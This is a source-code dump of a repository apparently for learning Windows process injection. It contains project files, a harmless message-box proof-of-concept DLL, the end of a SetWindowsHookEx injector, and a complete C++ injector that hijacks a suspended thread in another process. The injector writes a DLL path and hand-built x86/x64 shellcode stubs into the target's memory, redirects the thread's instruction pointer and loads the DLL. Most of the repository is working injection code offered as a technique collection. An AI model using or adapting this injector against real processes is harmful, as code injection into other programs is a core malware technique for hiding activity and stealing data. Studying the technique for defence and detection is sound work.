failure the code falls through, prints "successfully hooked" and calls UnhookWindowsHookEx with a NULL handle; this branch should return. */ 50 | printf("The KEYBOARD could not be hooked.\n"); 51 | } 52 | 53 | /* 54 | * Unhook the function. 
55 | */ 56 | printf("Program successfully hooked.\nPress enter to unhook the function and stop the program.\n"); 57 | getchar(); 58 | UnhookWindowsHookEx(handle); 59 | 60 | return 0; 61 | } 62 | -------------------------------------------------------------------------------- /DLLInjection-SetWindowsHookEx/DLLInjection-SetWindowsHookEx/DLLInjection-SetWindowsHookEx.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {8FFAB8DB-CAEE-46AD-9FFE-77C89A4DE069} 24 | Win32Proj 25 | DLLInjectionSetWindowsHookEx 26 | 10.0.17763.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v141 33 | MultiByte 34 | 35 | 36 | Application 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v141 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v141 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Use 88 | Level3 89 | Disabled 90 | true 91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | pch.h 94 | 95 | 96 | Console 97 | true 98 | 99 | 100 | 101 | 102 | Use 103 | Level3 104 | Disabled 105 | true 106 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 107 | true 108 | pch.h 109 | 110 | 111 | Console 112 | true 113 | 114 | 115 | 116 | 117 | Use 118 | Level3 119 | MaxSpeed 120 | true 121 | true 122 | true 123 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 124 | true 125 | pch.h 126 | 127 | 128 | Console 129 | true 130 | true 131 | true 132 | 133 | 134 | 135 | 136 | Use 137 | Level3 138 | MaxSpeed 139 | true 140 | true 141 | true 142 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 143 | true 144 | pch.h 145 | 146 | 147 | Console 148 | true 149 | true 150 | true 151 | 152 | 153 | 154 | 155 | 
156 | 157 | 158 | 159 | Create 160 | Create 161 | Create 162 | Create 163 | 164 | 165 | 166 | 167 | 168 | -------------------------------------------------------------------------------- /DLLInjection-SetWindowsHookEx/DLLInjection-SetWindowsHookEx/DLLInjection-SetWindowsHookEx.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | 23 | 24 | Source Files 25 | 26 | 27 | Source Files 28 | 29 | 30 | -------------------------------------------------------------------------------- /DLLInjection-SetWindowsHookEx/DLLInjection-SetWindowsHookEx/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to pre-compiled header; necessary for compilation to succeed 2 | 3 | #include "pch.h" 4 | 5 | // In general, ignore this file, but keep it around if you are using pre-compiled headers. 6 | -------------------------------------------------------------------------------- /DLLInjection-SetWindowsHookEx/DLLInjection-SetWindowsHookEx/pch.h: -------------------------------------------------------------------------------- 1 | // Tips for Getting Started: 2 | // 1. Use the Solution Explorer window to add/manage files 3 | // 2. Use the Team Explorer window to connect to source control 4 | // 3. Use the Output window to see build output and other messages 5 | // 4. Use the Error List window to view errors 6 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project 7 | // 6. 
In the future, to open this project again, go to File > Open > Project and select the .sln file 8 | 9 | #ifndef PCH_H 10 | #define PCH_H 11 | 12 | // TODO: add headers that you want to pre-compile here 13 | 14 | #endif //PCH_H 15 | -------------------------------------------------------------------------------- /PoC_Dll/PoC_Dll.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.489 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "PoC_Dll", "PoC_Dll\PoC_Dll.vcxproj", "{6CC3D6DC-77C2-4FAE-BE80-BD371B0D700A}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {6CC3D6DC-77C2-4FAE-BE80-BD371B0D700A}.Debug|x64.ActiveCfg = Debug|x64 17 | {6CC3D6DC-77C2-4FAE-BE80-BD371B0D700A}.Debug|x64.Build.0 = Debug|x64 18 | {6CC3D6DC-77C2-4FAE-BE80-BD371B0D700A}.Debug|x86.ActiveCfg = Debug|Win32 19 | {6CC3D6DC-77C2-4FAE-BE80-BD371B0D700A}.Debug|x86.Build.0 = Debug|Win32 20 | {6CC3D6DC-77C2-4FAE-BE80-BD371B0D700A}.Release|x64.ActiveCfg = Release|x64 21 | {6CC3D6DC-77C2-4FAE-BE80-BD371B0D700A}.Release|x64.Build.0 = Release|x64 22 | {6CC3D6DC-77C2-4FAE-BE80-BD371B0D700A}.Release|x86.ActiveCfg = Release|Win32 23 | {6CC3D6DC-77C2-4FAE-BE80-BD371B0D700A}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {C55E8844-FBDD-49B7-9C02-C80AC9B694F5} 30 | EndGlobalSection 31 | EndGlobal 32 | 
-------------------------------------------------------------------------------- /PoC_Dll/PoC_Dll/PoC_Dll.cpp: -------------------------------------------------------------------------------- 1 | // PoC_Dll.cpp : Defines the exported functions for the DLL application. 2 | // 3 | 4 | #include "stdafx.h" 5 | /* poc: exported test payload; shows a message box and returns TRUE. The commented-out lines below preserve an earlier HOOKPROC-shaped signature (code, wParam, lParam) with a CallNextHookEx chain; the current zero-argument form does not honour that contract when installed as a hook. */ 6 | //extern "C" __declspec(dllexport) int poc(int code, WPARAM wParam, LPARAM lParam) { 7 | extern "C" __declspec(dllexport) BOOL poc() { 8 | MessageBox(NULL, "POC called!", "Inject All The Things!", 0); 9 | 10 | //return(CallNextHookEx(NULL, code, wParam, lParam)); 11 | return TRUE; 12 | } 13 | -------------------------------------------------------------------------------- /PoC_Dll/PoC_Dll/PoC_Dll.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {6CC3D6DC-77C2-4FAE-BE80-BD371B0D700A} 24 | Win32Proj 25 | PoCDll 26 | 10.0.17763.0 27 | 28 | 29 | 30 | DynamicLibrary 31 | true 32 | v141 33 | MultiByte 34 | 35 | 36 | DynamicLibrary 37 | false 38 | v141 39 | true 40 | Unicode 41 | 42 | 43 | DynamicLibrary 44 | true 45 | v141 46 | Unicode 47 | 48 | 49 | DynamicLibrary 50 | false 51 | v141 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Use 88 | Level3 89 | Disabled 90 | true 91 | WIN32;_DEBUG;POCDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 92 | true 93 | 94 | 95 | Windows 96 | true 97 | 98 | 99 | 100 | 101 | Use 102 | Level3 103 | Disabled 104 | true 105 | _DEBUG;POCDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 106 | true 107 | 108 | 109 | Windows 110 | true 111 | 112 | 113 | 114 | 115 | Use 116 | Level3 117 | MaxSpeed 118 | true 119 | true 120 | true 121 | 
WIN32;NDEBUG;POCDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 122 | true 123 | 124 | 125 | Windows 126 | true 127 | true 128 | true 129 | 130 | 131 | 132 | 133 | Use 134 | Level3 135 | MaxSpeed 136 | true 137 | true 138 | true 139 | NDEBUG;POCDLL_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 140 | true 141 | 142 | 143 | Windows 144 | true 145 | true 146 | true 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | Create 158 | Create 159 | Create 160 | Create 161 | 162 | 163 | 164 | 165 | 166 | -------------------------------------------------------------------------------- /PoC_Dll/PoC_Dll/PoC_Dll.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | 26 | 27 | Source Files 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | -------------------------------------------------------------------------------- /PoC_Dll/PoC_Dll/dllmain.cpp: -------------------------------------------------------------------------------- 1 | // dllmain.cpp : Defines the entry point for the DLL application. 
2 | #include "stdafx.h" 3 | #include 4 | #include 5 | /* DllMain: entry point for PoC_Dll. No work is done for any attach/detach reason, so the function only reports success to the loader. */ 6 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) 7 | { 8 | (void)hModule; 9 | (void)ul_reason_for_call; 10 | (void)lpReserved; 11 | return TRUE; 12 | } 13 | -------------------------------------------------------------------------------- /PoC_Dll/PoC_Dll/stdafx.cpp: -------------------------------------------------------------------------------- 1 | #include "stdafx.h" 2 | -------------------------------------------------------------------------------- /PoC_Dll/PoC_Dll/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | // Windows Header Files 12 | #include 13 | 14 | 15 | 16 | // reference additional headers your program requires here 17 | -------------------------------------------------------------------------------- /PoC_Dll/PoC_Dll/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 
7 | 8 | #include 9 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ProcessInjectionTechniques 2 | Learning Various Process Injection Techniques 3 | 4 | 5 | Method | 32 bits | 64 bits | todo 6 | -----------------------|---------|---------|------- 7 | CreateRemoteThread() | + | + | done 8 | NtCreateThreadEx() | + | + | done 9 | QueueUserAPC() | + | + | done 10 | SetWindowsHookEx() | + | + | done 11 | RtlCreateUserThread() | + | + | done 12 | SetThreadContext() | + | + | done 13 | Reflective DLL | + | + | ToDo -------------------------------------------------------------------------------- /SuspendInjectResume/SuspendInjectResume.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.489 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SuspendInjectResume", "SuspendInjectResume\SuspendInjectResume.vcxproj", "{4177063C-98E8-4E61-B3E9-6CF709C3E0D1}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {4177063C-98E8-4E61-B3E9-6CF709C3E0D1}.Debug|x64.ActiveCfg = Debug|x64 17 | {4177063C-98E8-4E61-B3E9-6CF709C3E0D1}.Debug|x64.Build.0 = Debug|x64 18 | {4177063C-98E8-4E61-B3E9-6CF709C3E0D1}.Debug|x86.ActiveCfg = Debug|Win32 19 | {4177063C-98E8-4E61-B3E9-6CF709C3E0D1}.Debug|x86.Build.0 = Debug|Win32 20 | {4177063C-98E8-4E61-B3E9-6CF709C3E0D1}.Release|x64.ActiveCfg = Release|x64 21 | {4177063C-98E8-4E61-B3E9-6CF709C3E0D1}.Release|x64.Build.0 = Release|x64 22 | 
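{4177063C-98E8-4E61-B3E9-6CF709C3E0D1}.Release|x86.ActiveCfg = Release|Win32
{4177063C-98E8-4E61-B3E9-6CF709C3E0D1}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {05E29D09-D557-4EFB-B1DB-2539CDD9439E}
EndGlobalSection
EndGlobal
--------------------------------------------------------------------------------
/SuspendInjectResume/SuspendInjectResume/SuspendInjectResume.cpp:
--------------------------------------------------------------------------------
// SuspendInjectResume.cpp : DLL injection by thread hijacking (suspend / set IP / resume).
//
// Flow: open the target, copy the DLL path and a small position-independent stub into it,
// suspend one of the target's threads, point that thread's instruction pointer at the stub,
// resume.  The stub saves the thread's registers, calls LoadLibraryW(path), restores the
// registers and returns to the instruction the thread was about to execute.
//
// Things a user of this technique must keep in mind:
//  * The hijacked thread runs LoadLibraryW from wherever it happened to be.  If it holds the
//    loader lock, or a lock the DLL's DllMain needs, the target deadlocks.
//  * A thread blocked in a kernel wait only picks up the new context when the wait returns,
//    which may be much later than any timeout here.  Memory the stub needs is therefore never
//    freed on a timer (that would be a use-after-free inside the target); see hijackAndLoad.
//  * Injector and target bitness must match: the stub is architecture specific and
//    LoadLibraryW's address is taken from this process.

#include "pch.h"
#include <windows.h>
#include <tlhelp32.h>
#include <cstdio>
#include <cstdlib>
#include <cstring>


// Returns the ID of the first thread owned by `pid` that can be opened with the rights the
// hijack needs (get/set context, suspend/resume), or 0 if there is none.
// Which thread Toolhelp lists first is not specified; in practice it is usually the process's
// initial thread, but callers should not rely on that.
// The probe handle and the snapshot are closed before returning; the caller re-opens the thread.
DWORD getThreadID(DWORD pid)
{
    const DWORD wanted = THREAD_GET_CONTEXT | THREAD_SET_CONTEXT | THREAD_SUSPEND_RESUME;

    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    if (snap == INVALID_HANDLE_VALUE)
    {
        wprintf(L"[-] Error: CreateToolhelp32Snapshot failed (%lu).\n", GetLastError());
        return 0;
    }

    DWORD found = 0;
    THREADENTRY32 te;
    te.dwSize = sizeof(te);
    if (Thread32First(snap, &te))
    {
        do
        {
            // Only trust th32OwnerProcessID if the entry is large enough to contain it.
            if (te.dwSize < FIELD_OFFSET(THREADENTRY32, th32OwnerProcessID) + sizeof(te.th32OwnerProcessID))
                continue;
            if (te.th32OwnerProcessID != pid)
                continue;

            HANDLE probe = OpenThread(wanted, FALSE, te.th32ThreadID);
            if (probe == NULL)
            {
                wprintf(L"[-] Warning: could not open thread %lu (%lu), trying the next one.\n",
                        te.th32ThreadID, GetLastError());
                continue;
            }
            CloseHandle(probe);   // the original leaked this handle
            found = te.th32ThreadID;
            break;
        } while (Thread32Next(snap, &te));
    }

    CloseHandle(snap);            // the original skipped this on the success path
    return found;
}

// True if `path` (compared case-insensitively against the loader's recorded full path) is in
// the module list of `pid`.  Used to confirm LoadLibraryW ran instead of sleeping blindly.
// NOTE(review): the loader stores the path it resolved; if the caller passes a non-canonical
// spelling (8.3 names, forward slashes) this check can miss a DLL that did load.
static bool isModuleLoaded(DWORD pid, PCWSTR path)
{
    // SNAPMODULE32 covers WOW64 targets; the snapshot can fail transiently (ERROR_BAD_LENGTH),
    // which simply reads as "not loaded yet" to the polling loop.
    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE | TH32CS_SNAPMODULE32, pid);
    if (snap == INVALID_HANDLE_VALUE)
        return false;

    bool found = false;
    MODULEENTRY32W me;
    me.dwSize = sizeof(me);
    if (Module32FirstW(snap, &me))
    {
        do
        {
            if (_wcsicmp(me.szExePath, path) == 0)
            {
                found = true;
                break;
            }
        } while (Module32NextW(snap, &me));
    }

    CloseHandle(snap);
    return found;
}

// True if the target runs the same architecture as this injector.  Injecting the stub below
// across the WOW64 boundary crashes the target, so the caller refuses on a mismatch.
// Needs PROCESS_QUERY_LIMITED_INFORMATION on hProcess.
static bool sameBitness(HANDLE hProcess)
{
    BOOL selfWow64 = FALSE;
    BOOL targetWow64 = FALSE;
    if (!IsWow64Process(GetCurrentProcess(), &selfWow64) ||
        !IsWow64Process(hProcess, &targetWow64))
    {
        wprintf(L"[-] Error: IsWow64Process failed (%lu).\n", GetLastError());
        return false;
    }
#ifdef _WIN64
    (void)selfWow64;
    return targetWow64 == FALSE;        // 64-bit injector needs a native 64-bit target
#else
    return selfWow64 == targetWow64;    // 32-bit injector: both WOW64, or both on a 32-bit OS
#endif
}

#ifndef _WIN64

// x86 stub.  The 0xCC immediates are patched in buildStub at the offsets named below.
//   push <oldEip>         ; return address for the final ret
//   pushfd / pushad       ; preserve flags and all general registers
//   push <dllPath>        ; LoadLibraryW argument (stdcall: the callee pops it)
//   mov eax, <LoadLibraryW>
//   call eax
//   popad / popfd
//   ret                   ; back to oldEip
static const unsigned char sc[] =
{
    0x68, 0xCC, 0xCC, 0xCC, 0xCC,   // push imm32        (oldEip,       kRetOff  = 1)
    0x9C,                           // pushfd
    0x60,                           // pushad
    0x68, 0xCC, 0xCC, 0xCC, 0xCC,   // push imm32        (dllPath,      kDllOff  = 8)
    0xB8, 0xCC, 0xCC, 0xCC, 0xCC,   // mov eax, imm32    (LoadLibraryW, kFuncOff = 13)
    0xFF, 0xD0,                     // call eax
    0x61,                           // popad
    0x9D,                           // popfd
    0xC3                            // ret
};
static const size_t kRetOff  = 1;
static const size_t kDllOff  = 8;
static const size_t kFuncOff = 13;
typedef DWORD stubptr_t;

#else

// x64 stub.  Compared with the previous version this one (a) actually places the saved RIP on
// the stack so the final ret returns to it -- the old stub moved it into rax and then popped
// the original rax over it, returning to whatever was on the thread's stack -- and (b) aligns
// rsp to 16 and reserves the 32-byte shadow space the x64 calling convention gives the callee;
// without it LoadLibraryW's spills land on the pushed r13-r15 of the hijacked thread.
static const unsigned char sc[] =
{
    0x50,                                                       // push rax            ; slot that becomes the return address
    0x48, 0xB8, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, // mov rax, imm64      ; oldRip       (kRetOff  = 3)
    0x48, 0x87, 0x04, 0x24,                                     // xchg [rsp], rax     ; [rsp] = oldRip, rax = original rax
    0x50,                                                       // push rax            ; save original rax
    0x9C,                                                       // pushfq
    0x51, 0x52, 0x53, 0x55, 0x56, 0x57,                         // push rcx, rdx, rbx, rbp, rsi, rdi
    0x41, 0x50, 0x41, 0x51, 0x41, 0x52, 0x41, 0x53,             // push r8,  r9,  r10, r11
    0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57,             // push r12, r13, r14, r15
    0x48, 0x89, 0xE5,                                           // mov rbp, rsp        ; rbp itself was saved above
    0x48, 0x83, 0xE4, 0xF0,                                     // and rsp, -16        ; ABI: rsp 16-byte aligned at the call
    0x48, 0x83, 0xEC, 0x20,                                     // sub rsp, 0x20       ; 32-byte shadow space for the callee
    0x48, 0xB9, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, // mov rcx, imm64      ; dllPath      (kDllOff  = 52)
    0x48, 0xB8, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, // mov rax, imm64      ; LoadLibraryW (kFuncOff = 62)
    0xFF, 0xD0,                                                 // call rax
    0x48, 0x89, 0xEC,                                           // mov rsp, rbp        ; drop shadow space and alignment padding
    0x41, 0x5F, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C,             // pop r15, r14, r13, r12
    0x41, 0x5B, 0x41, 0x5A, 0x41, 0x59, 0x41, 0x58,             // pop r11, r10, r9,  r8
    0x5F, 0x5E, 0x5D, 0x5B, 0x5A, 0x59,                         // pop rdi, rsi, rbp, rbx, rdx, rcx
    0x9D,                                                       // popfq
    0x58,                                                       // pop rax             ; original rax
    0xC3                                                        // ret                 ; -> oldRip
};
static const size_t kRetOff  = 3;
static const size_t kDllOff  = 52;
static const size_t kFuncOff = 62;
typedef DWORD64 stubptr_t;

#endif

// Copies the stub template into `out` (sizeof(sc) bytes) and patches the three immediates.
// The template itself stays const so the function is safe to call more than once.
static void buildStub(unsigned char *out, stubptr_t oldIp, stubptr_t dllPath, stubptr_t loadLib)
{
    memcpy(out, sc, sizeof(sc));
    memcpy(out + kRetOff,  &oldIp,   sizeof(oldIp));
    memcpy(out + kDllOff,  &dllPath, sizeof(dllPath));
    memcpy(out + kFuncOff, &loadLib, sizeof(loadLib));
}

// Shared implementation behind demoSuspendInjectResume / demoSuspendInjectResume64.
// pszLibFile   : absolute path of the DLL to load inside the target (copied verbatim).
// dwProcessId  : target PID.
// Returns 0 once the DLL shows up in the target's module list, 1 on any failure or timeout.
// On every failure path before the thread is released, the target is left exactly as found:
// allocations released, thread resumed with its original context.
static DWORD hijackAndLoad(PCWSTR pszLibFile, DWORD dwProcessId)
{
    const DWORD  kLoadTimeoutMs = 8000;    // was a blind Sleep(8000) followed by VirtualFreeEx
    const DWORD  kPollMs        = 250;
    const SIZE_T pathBytes      = (wcslen(pszLibFile) + 1) * sizeof(wchar_t);
    const SIZE_T stubLen        = sizeof(sc);
    // Least privilege: exactly the rights the steps below use, not PROCESS_ALL_ACCESS.
    const DWORD  procAccess     = PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_VM_OPERATION |
                                  PROCESS_VM_READ | PROCESS_VM_WRITE;
    const DWORD  threadAccess   = THREAD_GET_CONTEXT | THREAD_SET_CONTEXT | THREAD_SUSPEND_RESUME;

    DWORD     rc        = 1;
    HANDLE    hProcess  = NULL;
    HANDLE    hThread   = NULL;
    LPVOID    lpDllAddr = NULL;
    LPVOID    stub      = NULL;
    bool      suspended = false;
    bool      armed     = false;   // once true the target may run the stub, so nothing in it is freed
    DWORD     threadID  = 0;
    DWORD     oldProt   = 0;
    SIZE_T    written   = 0;
    FARPROC   loadLib   = NULL;
    CONTEXT   ctx;
    CONTEXT   savedCtx;
    stubptr_t oldIp;
    unsigned char stubBuf[sizeof(sc)];

    wprintf(L"[+] Shellcode Length is: %zu\n", stubLen);

    hProcess = OpenProcess(procAccess, FALSE, dwProcessId);
    if (hProcess == NULL)
    {
        wprintf(L"[-] Error: Could not open process for PID (%lu), error %lu.\n", dwProcessId, GetLastError());
        goto cleanup;
    }
    if (!sameBitness(hProcess))
    {
        wprintf(L"[-] Error: PID (%lu) is not the same architecture as this injector; refusing to inject.\n", dwProcessId);
        goto cleanup;
    }

    // kernel32 is mapped at the same base in every same-bitness process for the lifetime of a
    // boot session, so the local address of LoadLibraryW is valid inside the target as well.
    loadLib = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "LoadLibraryW");
    if (loadLib == NULL)
    {
        wprintf(L"[-] Error: Could not find LoadLibraryW function inside kernel32.dll library.\n");
        goto cleanup;
    }

    // The DLL path is plain data: read/write, never executable.
    lpDllAddr = VirtualAllocEx(hProcess, NULL, pathBytes, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (lpDllAddr == NULL)
    {
        wprintf(L"[-] Error: Could not allocate memory inside PID (%lu), error %lu.\n", dwProcessId, GetLastError());
        goto cleanup;
    }
    if (!WriteProcessMemory(hProcess, lpDllAddr, pszLibFile, pathBytes, &written) || written != pathBytes)
    {
        wprintf(L"[-] Error: Could not write the DLL path into the PID (%lu) address space.\n", dwProcessId);
        goto cleanup;
    }

    // The stub is written while the page is RW and flipped to RX before the thread is released.
    stub = VirtualAllocEx(hProcess, NULL, stubLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (stub == NULL)
    {
        wprintf(L"[-] Error: Could not allocate memory for stub, error %lu.\n", GetLastError());
        goto cleanup;
    }

    threadID = getThreadID(dwProcessId);
    if (threadID == 0)
    {
        wprintf(L"[-] Error: No usable thread found in PID (%lu).\n", dwProcessId);
        goto cleanup;
    }
    hThread = OpenThread(threadAccess, FALSE, threadID);
    if (hThread == NULL)
    {
        wprintf(L"[-] Could not open thread %lu, error %lu.\n", threadID, GetLastError());
        goto cleanup;
    }
    if (SuspendThread(hThread) == (DWORD)-1)
    {
        wprintf(L"[-] Error: SuspendThread failed (%lu).\n", GetLastError());
        goto cleanup;
    }
    suspended = true;

    // A failed GetThreadContext previously went unnoticed and an uninitialised IP was baked
    // into the stub as the return address.
    ctx.ContextFlags = CONTEXT_CONTROL;
    if (!GetThreadContext(hThread, &ctx))
    {
        wprintf(L"[-] Error: GetThreadContext failed (%lu).\n", GetLastError());
        goto cleanup;
    }
    savedCtx = ctx;
#ifdef _WIN64
    oldIp   = ctx.Rip;
    ctx.Rip = (DWORD64)(ULONG_PTR)stub;
#else
    oldIp   = ctx.Eip;
    ctx.Eip = (DWORD)(ULONG_PTR)stub;
#endif

    buildStub(stubBuf, oldIp, (stubptr_t)(ULONG_PTR)lpDllAddr, (stubptr_t)(ULONG_PTR)loadLib);

#ifdef _DEBUG
    wprintf(L"[+] Shellcode Launcher Code:\n\t");
    for (size_t i = 0; i < stubLen; i++)
        wprintf(L"%02x ", stubBuf[i]);
    wprintf(L"\n");
#endif

    if (!WriteProcessMemory(hProcess, stub, stubBuf, stubLen, &written) || written != stubLen)
    {
        wprintf(L"[-] Error: Could not write the stub into PID (%lu).\n", dwProcessId);
        goto cleanup;
    }
    if (!VirtualProtectEx(hProcess, stub, stubLen, PAGE_EXECUTE_READ, &oldProt))
    {
        wprintf(L"[-] Error: Could not make the stub executable (%lu).\n", GetLastError());
        goto cleanup;
    }
    FlushInstructionCache(hProcess, stub, stubLen);

    if (!SetThreadContext(hThread, &ctx))
    {
        wprintf(L"[-] Error: SetThreadContext failed (%lu).\n", GetLastError());
        goto cleanup;
    }
    armed = true;

    if (ResumeThread(hThread) == (DWORD)-1)
    {
        // Thread is still suspended with the hijacked IP; put the original context back so a
        // later resume by someone else is harmless, and only then allow cleanup to free memory.
        wprintf(L"[-] Error: ResumeThread failed (%lu); restoring original context.\n", GetLastError());
        if (SetThreadContext(hThread, &savedCtx))
            armed = false;
        goto cleanup;
    }
    suspended = false;

    // Wait for the loader to list the DLL instead of assuming it happened within 8 seconds.
    for (DWORD waited = 0; ; waited += kPollMs)
    {
        if (isModuleLoaded(dwProcessId, pszLibFile))
        {
            rc = 0;
            break;
        }
        if (waited >= kLoadTimeoutMs)
            break;
        Sleep(kPollMs);
    }

    if (rc == 0)
        wprintf(L"[+] %ls is loaded in PID (%lu).\n", pszLibFile, dwProcessId);
    else
        wprintf(L"[-] %ls did not appear in PID (%lu) within %lu ms. If the hijacked thread is blocked in a wait it will run the stub later.\n",
                pszLibFile, dwProcessId, kLoadTimeoutMs);

    // Deliberately no VirtualFreeEx once the thread is armed: the thread may not have reached
    // the stub yet, or may still be inside it when the module becomes visible.  Freeing on a
    // timer was a use-after-free in the target's address space; the two allocations together
    // are a few hundred bytes and are left in place.

cleanup:
    if (suspended)
        ResumeThread(hThread);
    if (!armed)
    {
        if (stub != NULL)
            VirtualFreeEx(hProcess, stub, 0, MEM_RELEASE);
        if (lpDllAddr != NULL)
            VirtualFreeEx(hProcess, lpDllAddr, 0, MEM_RELEASE);
    }
    if (hThread != NULL)
        CloseHandle(hThread);
    if (hProcess != NULL)
        CloseHandle(hProcess);
    return rc;
}

#ifndef _WIN64
// x86 entry point kept for callers; see hijackAndLoad.
DWORD demoSuspendInjectResume(PCWSTR pszLibFile, DWORD dwProcessId)
{
    return hijackAndLoad(pszLibFile, dwProcessId);
}
#else
// x64 entry point kept for callers; see hijackAndLoad.
DWORD demoSuspendInjectResume64(PCWSTR pszLibFile, DWORD dwProcessId)
{
    return hijackAndLoad(pszLibFile, dwProcessId);
}
#endif

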